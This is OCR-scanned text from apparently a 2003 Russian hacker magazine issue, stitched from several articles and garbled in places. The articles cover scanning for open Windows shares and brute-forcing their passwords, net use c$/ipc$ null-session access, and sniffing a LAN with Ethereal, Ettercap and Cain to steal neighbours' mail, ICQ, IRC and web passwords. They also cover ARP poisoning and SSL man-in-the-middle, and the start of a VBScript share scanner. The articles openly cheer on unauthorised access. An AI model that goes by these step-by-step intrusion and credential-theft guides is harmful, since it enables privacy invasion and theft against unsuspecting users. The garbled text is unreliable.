возможность быть замеченным и 
схваченным сам знаешь за что. 
Стоит заметить, что программа 
может сканировать только сети 
класса С, то есть ты можешь ввести 
стартовый и конечный адреса с 
одинаковыми первыми двумя 
цифрами. Так что если ты решил 
играть по-крупному, сканируй в 
несколько проходов по сегментам. 
Что касается сканирования 
диалапщиков, сидящих, например, 
у того же провайдера, что и ты, то 
тут IP-agpeca можно узнать 
следующими способами. Обычно у 
провайдера есть какой-то диапазон 
адресов, один из которых (из тех, 
которые в данный момент 
свободны) назначается тебе при 
каждом дозвоне (динамический IP). 
Можно, конечно, арендовать у 
прова статический IP (тот, который 
не меняется при каждом дозвоне), 
но это актуально для выделенных 
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Что-то нарыли... 


линий и висящих на ней серваков. 
Первые две группы цифр 
динамического IP не меняются, а 
вот последние две могут постоянно 
меняться для каждого из 
пользователей. В общем, 
достаточно посмотреть первые две 
группы в своем текущем 1Р'’шнике - 
это и будет маска подсети твоего 
прова. Например, IP может быть 
таким: 195.120.ххх.ххх. Можешь 
сканировать весь этот сегмент. 
Практика показывает, что в очень 
редких случаях ты не найдешь ни 
одного компа с открытыми дисками 
и принтерами. Причем очень часто 
открыты как минимум на чтение 
даже системные диски. Я думаю, ты 
уже понял, что можно на них найти 


и скачать :). Если тебе нужно 
проверить, нет ли открытых дисков 
у какого-то конкретного человека, 
то достаточно узнать его IP и 
задать его Legion'y и как 
начальный, и как конечный адрес. 


В ЛЕС ПО ЯГОДЫ-ГРИБЫ 
В локальных сетях, в особенности в 
тех, которые тянет по району 
провайдер и подключает через 
себя к Инету, можно найти 
огромное количество компьютеров 
с открытыми ресурсами. Так что 
если ты подключен к Инету как раз 
таким способом, то считай, что тебе 
здорово повезло. Мало того, что в 
локалках полно ламаков, которые в 
результате своей неграмотности 
расшаривают свои диски (иногда 
даже системные), так некоторые 
даже специально открывают 
ресурсы для кого-нибудь из своих 
знакомых, а то и для всех 
желающих, чтобы обмениваться с 
ними различными файлами. Но эти 
перцы, как правило, осторожные и 
открывают только одну папку для 
обмена, а не весь диск. Некоторые 
уники даже ее паролят, что, в 
общем, не проблема (скоро 
поймешь, почему). В таких сетях 
можно найти много вкусностей, 
например, фильмы в МРЕСА, MP3- 
файлы, дистрибутивы полезного 
софта, к тому же совершенно 
честным путем. Короче, если ты 
подключен в локальную сеть, то на 
рынок за дисками можно не ходить, 
главное - набраться терпения и 
найти общие ресурсы сканером. 
Поскольку сейчас все больше юзе- 
ров ставит себе Windows ХР, ве- 
роятность найти открытые ресурсы 
значительно повышается. Если ты 
еще не догоняешь, почему, то я 
поясню: в этой оси по умолчанию 
всегда открыта папка “SharedFol- 
ders”, в которой есть папки “My 
Music”, “My Pictures” и все в таком 
духе. Это, конечно, не великое go- 
стижение, но все же иногда некото- 
рые ламаки засовывают туда филь- 
мы, MP3 и прочие полезности. А это, 
если ты в одной сети с этим юзером 
и трафофрик у вас внутри сети 
бесплатный, уже представляет не- 
который интерес - не все же PWL-kKu 
и прочие файлики с паролями 
тырить. Также не стоит забывать и 
про пресловутый “net use 
//имя_компа/с$" или “net use 
//uma_komna/ipc$", a также нуль- 
сессии, которые при хорошем рас- 
кладе могут дать тебе полный goc- 
туп даже к нерасшаренному диску. 
Хотя это уже тема отдельной статьи, 
которой мы коснемся в другой раз, а 
пока вернемся к сканированию. 
После того как сканер закончит 
работу, он выдаст тебе найденные 
ресурсы (если повезет, конечно, а 
то можно и ничего не найти), 
останется только кликнуть на 


любом из них, и он добавится тебе 
в качестве удаленной папки. 


ЗАПАРОЛЕННЫЕ ДИСКИ 
Кликнул ты на диск в Legion 
(кстати, не только в нем), а он тебе 
выдает, что, мол, не может этот 
диск быть подключен, так как он 
запаролен. Это тоже не проблема. 
Заходи на сайт sequritylab.ru и 
качай оттуда прогу XIntruder. Эта 
штука довольно быстро подберет 
пароль к расшаренному диску. В 
поле Везоигсе введи путь к 
запароленному ресурсу (нечто 
вроде //имя_компа/имя_ресурса). 
Причем в качестве имени компа 
следует указать именно имя компа, 
а не его адрес. Имя можно узнать, 
введя в консоли команду net view 
[ip-agpec]. В none IP-agpec укажи 
адрес компа. Далее жми Start и 
наблюдай, как прога подбирает 
пароль. Если ничего не получи- 
лось, проверь, правильно ли ты 
ввел все данные. Прога работает 
методом перебора, так что может 
потребоваться некоторое время, 
пока она проверит все возможные 
комбинации. Но у меня по- 
требовалось не больше минуты(!) 
на подбор пароля из 4 букв, а 
частенько больше и не бывает. 
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ВДОГОНКУ 

Вот тебе все нехитрые премудрости 
поиска и подключения 
расшаренных дисков. Еще раз хочу 
напомнить, что мы рассказываем 
тебе все это только в 
познавательных целях, а ты 
решаешь сам, как тебе применять 
эту информацию. За ее 
использование на практике могут 
больно надавать по шаловливым 
ручонкам, забрать на Альфа 
Центавру и высосать мозг. 
Теоретически провайдер, если 
засечет процесс сканирования, 
имеет право отключить тебя от 
сети или даже, если твои действия 
покажутся ему слишком циничными 
и наглыми или на тебя будут 
жаловаться пользователи, 
сообщить куда следует. Так что, 
прежде чем сесть за клавиатуру и 
запустить сканер шар, сожги этот 
журнал, выдерни шнур и выдави 
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B Windows XP 
вероятность 
найти откры- 
тые ресурсы 
значительно 
повышается, 
так как там по 
умолчанию 
всегда откры- 
та папка “Sha- 
redFolders", в 
которой есть 
папки “My 
Musuic”, “Му 
Pictures”. 


sequritylab.ru 
= отличный 
сайт с боль- 
шим количест- 
вом инфы, 
софта и экс- 
плоитов. 
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Не хочешь 
оказаться на 
месте твоего 
соседа? Вдруг 
кто-то уже ис- 
пользует 
сниффер в 
твоей сети? 
Пора подумать 
о методах за- 
щиты! Пожа- 
луй, наиболее 
действенным в 
данном случае 
является 
шифрование 
передаваемых 
данных. 


ХОЧЕШЬ ЗНАТЬ, ЧТО 
ПРОИСХОДИТ В ЛОКАЛКЕ? 


ЮЗАЕМ ПРАВИЛЬНЫЙ СНИФФЕР 
ДЛЯ ПРАВИЛЬНОЙ ОСИ 


Ушаков Андрей aka A-nd-Y 
(Andy_@timus.ru) 


Работая с Линухом, ты все больше убеждаешься, что эта ось идеально подходит для 
работы в сети. Но сетевая жизнь твоей оси, а тем более правильной, не будет 


полноценной без использования различных сетевых утилит. 


таковым, конечно же, 
относится и такая 
полезная штука, как 
сниффер. Давай рассмотрим 
работу конкретного снифоера Nog 
Линухом. Я хочу остановиться на 
Ethereal и показать некоторые из 
его возможностей. Это отнюдь не 
значит, что другие снифеферы не 
заслуживают детального рас- 
смотрения. Просто, на мой взгляд, 
Ethereal сочетает в себе удобство 
использования графического 
интерфейса gtk и все качества 
хорошего сниффера. Ты можешь 
возразить, что графический 
интерфейс в правильной оси, да 
еще и для сниффера - это ацтой и 
что все кулхацкеры сидят только в 
консоли. Не буду спорить, что 
консоль это круто, но графический 
интерфейс дает свои удобные 
возможности в работе: 
относительная простота освоения 
программы, легкость ее 
использования для начинающих 
пользователей, более наглядное и 
упорядоченное представление 
полученной информации. Я тебя 
еще не убедил :)? 


ПОСТАВИМ И НАТЯНЕМ 
Начнем с установки. Скачиваем 
Ethereal последней версии (на 
момент написания статьи таковой 
являлась версия 0.9.12) с сайта 
http://www.ethereal.com/down- 
loads.html. Архив tar.bz2 весит 
около 4 мегабайт (многовато в 
сравнении с текстовыми сниф- 
ферами, но программа стоит того). 
Распакуем архив: 


bzip2 -d ethereal-0.9.12.tar.bz2 
tar -xvf ethereal-0.9.12.tar 


В директории, куда ты поместил ска- 
чанный архив, появилась дира с име- 
нем ethereal-0.9.12. Переходим в нее: 


cd ethereal-0.9.12. 


Набрав Is, убеждаемся, что в нашем 
распоряжении есть скрипт 


ek 
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Красивый gtk-2 интерфейс радует глаз :) 


начальной конфигурации configure, 
куча файлов *.h и *.с и, конечно 
же, README. 

В простейшем случае установка 
выглядит так: 


/configure 
make 
make install 


Для получения информации об 
имеющихся опциях скрипта config- 
иге набери: 


./configure -help 


Стоит также почитать README - там 
наверняка будут ответы на многие 
из появившихся у тебя вопросов 
об установке программы. Лично я 
выбрал опцию “—enable-gtk2” 
(ИМХО, покрасивее будет). На моей 
тачке (РИ! - 800/256 ram) 
компиляция длилась около 10 
минут, после чего я получил 
готовый к работе снифоер. 
Проверь на всякий случай, гладко 
ли все прошло: набери в командной 
строке “whereis ethereal”. И если ты 
увидел в ответ что-то типа 
"/изгЛоса/Ытп/евегеа!", то 
программа успешно установлена. 
Запускай Ethereal от root, иначе 
ничего не выйдет: интерфейс 
программы ты увидишь, но 
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стартануть сниффер не удастся - 
изменение параметров сетевого 
интерфейса требует прав 
суперпользователя. Простейший 
запуск осуществляется командой 
“ethereal” (если директории, куда 
проинсталлировался Ethereal нет в 
твоем РАТН, то пиши полный путь к 
программе для ее вызова). 


ВНУТРИ 

После запуска мы видим программу 
с довольно приятным интерфейсом 
(не зря я указал опцию "-епаЫе- 
gtk2"). Рабочее окно разделено на 
три части по горизонтали: самая 
верхняя - отображает краткую ин- 
формацию о пакете (порядковый 
номер, время, адреса отправителя и 
получателя, тип пакета). Второе 
подокно отображает информацию 
из заголовка пакета. Третье - сами 
данные пакета как в коде ASCII, так 
и в виде шестнадцатеричного 
дампа. Под окнами находится 
строка, позволяющая выбрать один 
из имеющихся фильтров для 
пакетов, кнопка очистки окна и 
строка статуса. 


Главное меню программы 
предоставляет следующие пункты: 
File - команды общего назначения, 
Edit - параметры настройки 
программы, Capture - запуск и 
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Список поддерживаемых протоколов 
впечатляет 


остановка снифорера, Display - 
опции отображения инфы, Tools - 
различные дополнительные тулзы. 
В меню Edit ты найдешь пункты 
Preferenses - здесь можно задать 
общие настройки программы: 
внешний вид, параметры снифора, 
параметры протоколов. Пункты 
Capture Filters и Display Filters 
позволяют работать с фильтрами 
(добавлять, удалять и изменять). 
Думаю, с Preferences ты 
разберешься сам, а вот работу с 
фильтрами рассмотрим более 
подробно. Фильтры позволяют тебе 
получать только те данные, которые 
тебе нужны. При работе с сотнями 
пакетов это важно. Для начала ты 
должен четко знать, какая 
информация тебе нужна, и, в 
соответствии с этим, создавать 
собственные правила для фильтров. 


УСТАНОВИМ ФИЛЬТР 

Наша задача почитать почту, 
посмотреть, какие страницы 
загружал сосед, узнать его пароль 
на e-mail, перехватить 1ВС-чат и 
получить пассы от аськи. Ты ведь 
уже знаешь порты, на которых 
работают эти сервисы? Если нет, то 
быстрее бери умную книжку и 
просвещайся. Немного подумав :), 
приходим к тому, что нам нужно 
получать все ТСР пакеты gna 80, 
ПО, 5190, 6667 портов и 
приходящие с них. 

Приступаем к созданию фильтра. 
Ползи в “Edit” > “Display Filters” и 


жми на кнопку “Add Expressions” 
(добавить выражение). В появив- 
шемся окне создания фильтра в 
none "Ре Мате” увидишь огром- 
ный список протоколов, а в подме- 
ню к выбранному протоколу 
дополнительные опции для филь- 
тра. Выбираем протокол ТСР в поле 
“Field name” (все интересующие 
нас пакеты относятся именно к ТСР 
протоколу) и пункт в подменю 
“Source or Destination port”, что 
значит принимать пакеты для этих 
портов и идущие с них. В поле 
“Realtion” выбираем отношения 
поля правила к значению, в данном 
случае нас интересует 
эквивалентность (==), и в поле 
“Value” пишем порт 80. После чего 
жмем ОК, и в поле “Filter String” 
появляется выражение “{ср.рог{ == 
80", это простейшее выражение 
для фильтра. Для остальных 
портов можешь проделать такие 
же действия либо просто руками 
написать аналогичные выражения, 
объединяя их логическим 
оператором and (&&). В результате 
получаем правило: 


tcp.port == 80 && tcp.port == 110 && tcp.port 
== 5190 && tcp.port == 6667. 


Называем его, например, 
lansnifrules и жмем “Создать”. 
Правило готово. 


MOEM ЗОЛОТИШКО 
Возвращаемся к основному рабо- 
чему окну программы. Выбираем 
созданный фильтр, пускаем сниф- 
фер через “Capture” > “Start” и 
идем пить пиво, оставив сниффер 
делать свое злобное дело :). 
После старта появляется 
информационное окошко, которое 
отображает процентное 
соотношение пакетов от различных 
протоколов, обработанных 
снифофером. 

Через пару часов сниффер можно 
выключить и заняться изучением 
полученных данных. Как я уже 
писал, в верхнем окне видим 
краткую инфу о пакете, в среднем - 
подробный заголовок пакета, а 
внизу - его данные. 

Конечно, можно вручную изучать 
все пакеты в поисках нужной 


информации, но мы поступим 
умнее, тем более что для этого в 
Ethereal предусмотрено очень 
удобное средство: выбери в списке 
пакет определенного типа, 
например, РОР, и в мышином меню 
- команду “Follow ТСР STREAM”. В 
результате в новом открывшемся 
окне ты получишь абсолютно 
целые письма со всеми 
заголовками и содержанием, 
которые можно с легкостью читать, 
а также ход сессии общения с 
сервером в виде telnet команд, 
среди которых ты, конечно же, 
увидишь и пароли. 

Так же дела обстоят с html страни- 
цами и IRC мессагами. С аськой по- 
сложнее: даже объединяя все за- 
хваченные пакеты, читать что-либо 
вразумительное не удается, лишь 
отдельные обрывки - сказываются 
особенности протокола. 

Ethereal корректно отображает 
только koi8-r, так что, если хочешь 
читать что-то в ср1251, придется по- 
думать о перекодировке. Хотя это 
не составит для тебя труда - в про- 
стейшем случае можно восполь- 
зоваться текстовым редактором с 
поддержкой нескольких кодировок 
или браузером. 

К сожалению, в Ethereal отсутству- 
ет возможность автоматизирован- 
ного выдирания паролей и логинов 
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В ethereal встроено очень удобное средство для создания выражений фильтров 


= 
= - == i 
al 
== 


Если письма передавались в кодировке 


koi8-r, то их чтение не вызовет никаких 
проблем 


из пакета, так что придется поко- 
выряться самому. Опция выдира- 
ния паролей отлично реализована 
в Ettercap, что в очередной раз го- 
ворит, что в одну программу невоз- 
можно впихнуть все возможности, 
что-то будет хуже, что-то лучше, 
чем в других. Поэтому используй 
программы комплексно. 

Ну вот, ты уже имеешь все пароли 
от почты, стянул все шестизначки в 
твоей сетке, в курсе личной жизни 
соседей :). Ты, конечно, крут, но не 
забывай, законы еще никто не отме- 
нял, в том числе и статью о незакон- 
ном доступе к чужой информации. 
Естественно, возможности Ethereal 
не ограничиваются 
рассмотренными мною. С помощью 
этого замечательного снифефера 
можно узнать еще много 
интересного о жизни твоей сети. 
Все в твоих руках, дерзай! 
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Есть мнение, 
что сниффер 
нельзя обнару- 
жить. В опре- 
деленной сте- 
пени оно оши- 
бочно. В не- 
которых режи- 
мах сниффер 
проявляет се- 
тевую актив- 
ность, поэтому 
есть шанс его 
обнаружения. 
Все зависит от 
уровня адми- 
нов твоего 
провайдера. 


Почитай Linux 
Administration’ 
s Security Guide 
(http://www.tirn. 
ru/index.php? 
module=library& 
action=show& 
docid=193&part 
=1809) - в 
этом руковод- 
стве ты най- 
дешь множест- 
во полезной 
информации по 
защите и 
анализу сетей. 
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НЮХАЧИ, К БОЮ: 


ТЕСТИРУЕМ СНИФФЕРЫ ПОД WINDOWS 


Kirion (Kirion@winfo.org) 


Ha void.ru 
есть несколь- 
ко интерес- 
ных материа- 
лов про 
снифферы. 
Линки най- 
дешь сам :). 


“The lord of the (token) Ring (the fellowship of the packet)": “One ring to link them all, 


One ring to ping them, One ring to bring them all and in the darkness sniff them” :). 
Copyright Бу составители мануала Ettercap :). 


Tak, снифоферы gna 
боевого задания мы 
уже выбрали. Оста- 

лось только прослушать брифинг 

перед миссией и в бой! 


БРИФИНГ 

Бойцы! Нам вручено современное и 
очень мощное оружие под названи- 
ем Сниффер. Оно позволяет перех- 
ватывать всю информацию в сег- 
менте сети, к которому вы подклю- 
читесь. Принцип его действия та- 
ков: переведя коммуникаторы в 
беспорядочный (promiscuous) ре- 
жим (что позволяет принимать со- 
общения для всех узлов сегмента), 
он фильтрует полученную инфор- 
мацию, анализирует и выдает в 
значимом виде. Наиболее продви- 
нутые модели могут использовать- 
ся в среде, охраняемой выключате- 
лем (switch). Выключатель nepega- 
ет секретные пакеты только на тот 
узел, которому он непосредственно 
предназначен, отсекая, таким обра- 
зом, сегменты сети. Но, использо- 
вав специальные заряды для зара- 
жения таблиц адресов выключате- 
ля (ARP poison routing), мы можем 
изменить пути следования инфор- 
мации, пропуская пакеты опреде- 
ленного узла через себя. Более то- 
го, некоторые армейские заводы 
заявили, что их снифферы облада- 
ют возможностью перехватывать и 
расшифровывать пакеты с помет- 
кой “Совершенно секретно". Нам 
предстоит проверить эти заявле- 
ния, грозящие хаосом и анархией. 
Кроме того, основной боевой зада- 
чей является перехват пакетов, пе- 
реданных по известным протоко- 
лам: е-мыл, ай-си-кью, ай-эр-си 
(черт их побрал, не могут по-чело- 
вечески назвать :)) и аш-ти-ти-пи. 
По результатам учений, а также 
личного опроса бойцов будут опре- 
делены заводы, с которыми будут 
подписаны договоры (ну это мы 
еще посмотрим :)) на поставку во- 
оружения. Вольно! 


Е-МЫЛ 

Ну что, прослушал речь прапорщи- 
ка :). Тогда приступаем к делу. Нач- 
нем с самого легкого и часто встре- 
чающегося - перехвата паролей от 
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Mga, ну и где тут пароль? 


почты. Я лично читать чужую почту 
не люблю и перехватывал почту 
только однажды. Как часто бывает 
в таких случаях - из ревности :). 
Что мне было нужно узнать, не уз- 
нал, зато прочитал много тупых 
женских сплетен :). Ладно, настраи- 
вай фильтры на почту (это, скорее 
всего, порты 25-й, ПО-Й, 119-1 и 143- 
й, но основной порт - 10-Й, это 
POP3). Ну что же, все снифферы 
справились с этой задачей. Удоб- 
нее всего было, конечно же, в Сат 
(там все просто, не нужно даже со- 
держимое пакетов смотреть) и 
Ettercap (если в настройках разоб- 
раться). Сотт\Лем/ же начинает ра- 
зочаровывать - слишком уж неу- 
добно переходить от одного пакета 
к другому. Приблизительно так же 
ив Ethereal. Первые несколько пас- 
сов уже у нас в руках :). 


ТЕТЯ АСЯ 

С ICQ все немного хуже. Во-первых, 
структура запроса несколько слож- 
нее, чем у почты. Во-вторых, она от- 
личается в разных версиях аськи- 
ного протокола (а вдруг у тебя кто- 
нибудь использует старую асю, та- 
кое часто встречается, если аська - 
локальная). Ну а в-третьих... При 
коннекте аська передает UIN, свою 
версию и, теоретически, пароль. 
Можешь посмотреть на скрине пе- 
рехваченный пакет: ни фига там не 
разобрать пароля :(. А все потому, 
что он шифруется. Такая ситуация 
у нас везде: и в Iris, ив Ethereal, и в 


Poems ef FO т: 


A, BOT OH! 


Ettercap, и в CommView. А вот Cain 
все делает тихо и спокойно и выда- 
ет пароль :). Правда, я заметил од- 
ну странность: если заходил через 
аську, пароль он перехватывал. A 
если через мой любимый Trillian, то 
нет (кстати, судя по пакету, Trillian 
выдает себя за 2001 аську). Вероят- 
но, это связано с самим Cain. Бета 
все-таки... Ну а тем, кто хочет защи- 
тить свою переписку, могу посове- 
товать зайти на Www.encrsoft.com/ 
products/tsm.html и скачать Тор 
Secret Messenger. Это плагин для 
всех версий ICQ, добавляющий воз- 
MOMHOCTb ассиметричного шифро- 
вания сообщений. Там есть и пла- 
гин для Миранды с теми же функ- 
ЦИЯМИи. 


HTTP 

Ребята, пользуйтесь HTTPS. В 
майском номере была довольно 
подробная статья по этому поводу. 
То, как себя показали снифферы в 
данном тесте, лишний раз доказы- 
вает, что перехватить инфу через 
НТТР очень легко. Пароль переда- 
ется в открытом виде. Найти его 
несложно, вне зависимости от того, 
передавались ли данные с по- 
мощью get (т.е. через url) или с по- 
мощью post (т.е. через форму). Все 
снифферы прекрасно справились с 


192.168.11.49:3251 


—> 192.166.10.250:110 


pop3 


USER: kirion@mail.northnet.ru 


PASS: 


некими 


Часть лога ЕНегсар. Мы захватили мыло! 


этой задачей. Особенно Сат и 
Ettercap, которые умеют выделять 
пароли из содержимого пакета - не 
надо париться, просматривать еще 
чего-то :). То же самое и с ЕТР, и 
Telnet. Пароли передаются в откры- 
том и удобочитаемом виде. Реше- 
ние простое - использовать секь- 
юрные версии этих протоколов: 
SSH вместо Telnet, SFTP вместо 
FTP. Пользователи правильных 
осей - выбирайте OpenSSH 
(www.openssh.org), где есть модули 
для этих протоколов. Виндовым же 
юзерам можно попробовать эти 
порты: PUTTY (www.chiark.gree- 
nend.org.uk/~sgtatham/putty/), 
TTSSH (www.zip.com.au/~roca/ 
ttssh.html), существует версия 
OpenSSH gna Cygwin 
(www.cygmin.com) - эмулятора Ли- 
нукса под Винды. 


ИРКА 

Не самая актуальная проблема - 
достать пароль от ника, но все же. 
Как происходит идентификация на 
серверах, где есть сервисы типа 
Nickserv, Chanserv, etc? А очень 
просто: посылается мессага серви- 
су, в которой содержится пароль. 
Ну или можно поставить идентифи- 
кацию по маске и прочей хрени, но 
это нас уже не интересует. Мессаги 
передаются чистым текстом (мо- 
жешь даже почитать приваты :), хо- 
тя проще для этого воспользовать- 
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снифоинга?" - спросишь ты. А я 
отвечу: перехватить зашифрован- 
ный трафорик легко. Но вот сколь- 
ко веков ты будешь долбиться Hag 
128-битным ключом - это другой 
вопрос :). Естественно, что, перех- 
ватив шифрованный пакет, ты мо- 
жешь взять где-нибудь супер- 
компьютер и через минуту уже все 


Можешь посмотреть на скрине 
перехваченный пакет: 
ни сига там не разобрать пароля °C. 
А все потому, что он шифруется. 


ся специальными прогами, а то 
фильтровать замучаешься). Соот- 
ветственно, ловятся иркины пакеты 
любым нормальным сниффером 
(Cain не ловит - он не знает, что 
есть IRC :)). Защитить свое обще- 
ние можно (за двадцать минут по- 
иска я нашел плагин для шифрова- 
ния к MIRC здесь: 
cs.ttk.ru/files/encrypt.zip), но это 
сложно, да и пароли ты все равно 
не зашифруешь. Необходимо ме- 
нять сам принцип работы IRC, co3- 
давать альтернативу, поддержива- 
ющую шифрование в основе. Та- 
кой протокол существует: называ- 
ется он SILC, и почитать о нем мож- 
но на ru.silcnet.org. 


СВУРТО 

Если ты уже скачал ЕЦегсар или 
Cain, то мог заметить, что в них 
есть весьма интересные пункты 
для захвата криптованного Tpaq- 
фика. “A чего ты тут полстатьи 
гнал про шифрование и защиту от 


читать :). Однако есть способ нор- 
мально перехватывать криптован- 
ный трафорик, хотя он и достаточно 
сложен. Необходимо вклиниться 
между получателем и отправите- 
лем пакета, причем через тебя 
должна пройти вся защищенная 
сессия. Способ для этого есть - 
АРК, о нем я уже говорил. Итак, 
пользователь заходит с помощью 
SSL Ha сайт. Запрос идет к тебе, ты 
перенаправляешь его на сервак, 
заменяя IP и МАС. Назад отправля- 
ется сертификат с ключом, который 
ты сохраняешь, а пользователю 
взамен отправляешь поддельный. 
Когда соединение установлено - 
через тебя побегут зашифрован- 
ные пакеты. Но ключ-то у тебя есть 
:). Но это в теории. Скажу честно: 
ни с Cain, ни с Ettercap у меня так и 
не получилось перехватить Tpacp- 
фик. То есть они видели соедине- 
ние и посылали левые сертифика- 
ты, но расшифрованную сессию я 
так и не получил :(. Зато люди, ко- 


торые мне помогали (Special thanks 
to Trinity and Mercenario), сказали, 
что они вообще не могли зайти на 

защищенную страницу :). Может у 

тебя получится лучше... 


вольно! 

Ну что же, тестирование оружия 
прошло в целом успешно. Обычный 
траффик мы перехватили с успе- 
хом и даже пробили брешь в обо- 
роне защищенных соединений. Ос- 
тается сделать неутешительные 
выводы: снифферы это очень мощ- 
ное оружие, от которого весьма 
сложно защититься. Панацеей мог- 
ло бы стать применение шифрова- 
ния на низком уровне (IPsec и по- 
добные вещи), но до этого еще да- 
леко. Да и обнаружить их сложно 
при условии, что хакер грамотно 
все настроил. У себя на винте я 
обязательно оставлю Iris и Ettercap 
(мне он вообще показался самым 
лучшим, хотя и не очень удобным). 
Hy uy Cain есть шанс, если, конеч- 
но, доживет до финальной версии 
и обрастет документацией. 


АИ 
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Ha 
www.robert- 
graham.com/ 
pubs/sniffing- 
fag.html есть 
весьма 06- 
ширный FAQ 
по сниффе- 
рам. 


Кстати, ты 
знаешь, что 
sniffer - это 

зарегистриро- 
ванная торго- 
вая марка. 
Поэтому офи- 
циально про- 
ги зовутся 
network апа- 
lyzer :). 
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Для описания 
всех возмож- 
ностей WSH 

не хватит це- 
лого журнала 


кие примеры 


использования 
VBScript - 
знаменитые 
“LoveLetter” 
(“1 Love You") 
и “AnnaKour- 
nikova". 


Анализирующий 
(analyst1945@mail.ru) 


indows Script Host (ga- 

nee WSH) стандартно 

входит в Мазодай, Ha- 
чиная с версии 98 (тебе наверняка 
встречался пункт “Сервер сценари- 
eB" при установке Windows). 


Сервер сценариев Windows Script Host 
стандартно устанавливается в Windows 


Он предназначен в первую очередь 
для автоматизации функций 
Windows, так как обладает обшир- 
ными возможностями по работе с 
файловой системой, сетью, принте- 
рами, переменными окружения, 
приложениями е{с. Для описания 
всех его возможностей понадоби- 
лась бы вся эта статья. Дело в том, 
что WSH позволяет использовать, 
а также создавать свои установ- 
ленные в системе СОМ-компоненты, 
элементы управления ActiveX и 
инструментарий управления 
Windows WMI. Кроме того, WSH дает 
возможность доступа к службам ка- 
талогов через ADSI, к базам данных 
через ActiveX Data Object (ADO) ик 
функциям отправки почты через 
Collaboration Data Object (СВО). 
Скрипты gna Windows Script Host 
могут быть не только отдельными 


программами, но и встраиваться в 
НТМЕ-страницы, дабы быть исполь- 


и 
Среда разработки скриптов :) 


me 


== 
Lie Le 07(32) 2003 


зованными в технологии Active 
Server Pages (ASP), так же как 
VBScript и JScript. В общем, при 
достаточном навыке применение 
сценариев ограничено лишь твоей 
фантазией. 

Скрипт представляет собой обыч- 
ный текстовый файл с расширени- 
ем WSF, написанный на языке сце- 
нариев VBScript или JScript. Теоре- 
тически возможно использование и 
других языков. Создавать файлы 
можно в любом текстовом редакто- 
ре, способном сохранять документы 
в формате “только текст", напри- 
мер, Notepad. Единственное ограни- 
чение на размер сценариев - лимит, 
налагаемый операционной систе- 
мой на размер файла. 


ЗАПУСК И ИСПОЛНЕНИЕ 
СЦЕНАРИЕВ 

Для запуска скриптов имеются три 
пути: один из них - просто дважды 
щелкнуть по файлу или иконке. 
Другой - выбрать пункт “Выпол- 
нить” из меню “Пуск” и написать 
полное имя файла в поле. Наконец, 
можно запустить сервер сценариев 
WSH из того же “Выполнить”, доба- 
вив к нему имя скрипта и любой из 
возможных параметров. 

Сам WSH реализован в двух фай- 
лах: 

WScript.exe - сервер сценариев, 
предназначенный для взаимодей- 
ствия с пользователем через диа- 
логовые окна Windows. 

CScript.exe - консольное приложе- 
ние, работающее в окне командной 
строки. 

Выглядеть это должно так: 


WScript.exe полное_имя_сценария [пара- 
метры сервера] [аргументы сценария] 


или так: 


CScript.exe полное_имя_сценария [пара- 
метры сервера] [аргументы сценария] 


Параметры хоста включают или 
отключают различные опции 
Windows Scripting Host и всегда 
предваряются двумя прямыми сле- 
шами (//). Остальные параметры 
всегда предваряются одним пря- 
мым слешем (/). 


WINDOWS SCRIPT HOST 


ХАК С БЛОКНОТОМ НАПЕРЕВЕС 


Использование CScript в качестве 
сервера сценариев 


Использование WScript в качестве 
сервера сценариев 


Например, команда CScript.exe //? 
выведет список параметров серве- 
ра. Главная разница между ними в 
том, что только CScript.exe дает 
возможность пользоваться пере- 
менной окружения ERRORLEVEL 
интерпретатора команд 
command.com или cmd.exe (ERROR- 
LEVEL - переменная, содержащая 
код выхода из последней команды, 
выполненной интерпретатором ко- 
манод). 

Обычно сценарии WSH выполняют- 
ся без вывода диалоговых окон и 
сообщений. Например, при измене- 
нии ключей реестра, используя 
ВЕС файл, выводится два диалого- 
вых окна, при использовании же 
WSF файла - ни одного. Так что мо- 
жешь смело добавлять скрипты в 
автозагрузку. 

Как было сказано выше, сценарий 
представляет собой текстовый go- 
кумент. Для нормального исполне- 
ния сценария он должен содержать 
необходимые ХМ!-элементы. Их ми- 
нимальный набор таков: 


<?xml version="1.0" encoding="IS0-8859-1"?> 
<job id="T1"> 

<script language="VBScript"> 

«![СОАТАГ 

‘Здесь располагается сам сценарий. 
IP 

</script> 

</job> 


Если используется JScript, то атри- 
бут language следует заменить на 
соответствующий. 

WSH допускает использование нес- 
кольких языков в одном сценарии. 
Для этого нужно всего лишь доба- 
вить контейнер: 


<script language="JScript"> 

<IECDATAT 

‘Здесь располагается сам сценарий. 
Ip 

</script> 


указав в атрибуте language исполь- 
зуемый язык. Также возможно 
подключение скриптов из внешних 
файлов. Для этого добавляется 
следующий элемент: 


<script language="VBScript" $гс="имя_фай- 
na.vbs"> 


ОТ ТЕОРИИ - К ПРАКТИКЕ 
Перейдем непосредственно к напи- 
санию сценариев. Все примеры я бу- 
gy приводить на VBScript. На мой 
взгляд, VBScript гораздо удобнее, 
чем JScript, так как поддерживает 
процедуры и функции и в большин- 
стве случаев не чувствителен к реги- 
стру букв. Я не собираюсь обучать 
тебя основам VBScript, так как в OG- 
ной статье это просто невозможно, 
да и учебников по этой теме доста- 
точно. Для начала лишь отмечу ос- 
новные отличия VBScript от его стар- 
шего брата - Visual Ваз!с'а. Програм- 
мы Ha VBScript не могут быть ском- 
пилированы в ЕХЕ-файлы. Един- 
ственным типом данных, допустимым 


' Добавить в файл строку “Hello, 
Word!” 

Наиболее яркие примеры исполь- 
зования VBScript - знаменитые 
“LoveLetter” (“I Love You") и 
“AnnaKournikova”. 


Книги по WSH и VBScript: | 


Гюнтер Борн. Руководство разра- нарии в Windows Script Host - 
ботчика на Windows Script Host - Санкт-Петербург: ВНУ-СПб. 


Москва: Питер, 2001. 


'Под какой буквой его будем подк- 
лючать к твоему компу. 

UserzName = “User” 

‘Логин для подключения. В сетях 
ВыньДос 9х можно указать любой. 
Passlog = “c:\windows\FileSystem.log” 


Пол Ломакс. Изучаем VBScript - 


Попов А. Командные файлы и сце- Киев: ВНУ, 1998. 


Надеюсь, что вопросов пока не 
возникло. Теперь займемся непос- 
редственно кодингом. 


СКАНИРУЕМ ЛОКАЛКУ 

Ситуация первая: на серваке ты ви- 
дишь кучу зашаренных ресурсов, и 
твои руки непроизвольно тянутся к 
ним, однако в конце - полный облом 
с паролем :(. Если на твоем компе 
присутствуют дисководы и/или есть 
Инет - смело качай нужную прогу, 
дальше я тебе не советчик. Ну а ес- 
ли ничего из этого нет? Тут-то тебе 
и поможет сладкая парочка Блок- 
нот + WSH. Будешь писать сканер 
непосредственно на рабочем месте. 
Набивай следующие строчки. Ком- 
ментировать буду по ходу дела. 


